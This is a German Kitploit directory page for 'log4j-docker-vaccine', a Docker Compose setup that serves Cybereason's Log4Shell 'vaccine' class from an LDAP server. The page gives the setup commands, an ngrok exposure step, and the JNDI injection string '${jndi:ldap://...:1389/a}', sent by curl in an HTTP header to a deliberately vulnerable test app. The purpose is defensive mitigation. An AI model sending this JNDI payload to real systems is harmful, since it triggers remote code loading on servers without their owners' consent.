Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j-docker-vaccine — Docker Compose-Lösung zur Ausführung einer Vaccine-Umgebung für die log4j2-Sicherheitslücke CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/jeffbryner/log4j-docker-vaccine
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

Docker Compose-Lösung zur Ausführung einer Vaccine-Umgebung für die log4j2-Sicherheitslücke CVE-2021-44228

Repository anzeigen
2vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4j Docker-Impfstoff

Eine containerisierte Methode, um den von Cyberreason angebotenen Log4j-Impfstoff auszuführen

  • https://github.com/Cybereason/Logout4Shell

Ausführen

Klonen Sie dieses Repository:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

Bearbeiten Sie die Datei containers.env, um eine korrekte private oder öffentliche IP/DNS einzutragen, die Ihr Ziel erreichen kann. Der Standardeintrag wird für Sie wahrscheinlich nicht funktionieren!

Erstellen und starten Sie die Container:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

Sie haben nun einen lauschenden LDAP-Server, der die Log4jRCE-Klasse bereitstellt, um eine anfällige Log4j-Instanz zu immunisieren.

Sie können dies (wenn Sie möchten) mit ngrok dem Internet zugänglich machen.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

Sie können eine anfällige Log4j-Instanz mit der berüchtigten JNDI-Eingabezeichenfolge an diese Adresse senden:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

Testen

Es gibt eine absichtlich anfällige Version von Log4j in einem Container unter:

  • https://github.com/christophetd/log4shell-vulnerable-app

Sie können deren Anweisungen befolgen, um sie zu starten und für Tests zu verwenden:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Und lösen Sie die Immunisierung aus über:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
Tool herunterladen